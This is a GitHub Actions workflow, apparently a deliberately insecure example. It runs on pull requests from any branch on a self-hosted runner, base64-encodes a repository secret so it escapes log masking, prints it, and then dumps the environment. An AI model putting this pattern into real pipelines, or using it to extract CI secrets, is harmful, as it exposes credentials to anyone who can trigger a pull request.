name: deploy_prod

on:
  pull_request: #Run it when a PR is created to a branch
    branches:
      - "**"
jobs:
  deploy:
    runs-on: self-hosted-ubuntu
    steps:
      - name: Poor-man CI/CD
        run: |
          echo "${{secrets.TOP_SECRET_1}}" | base64
          env
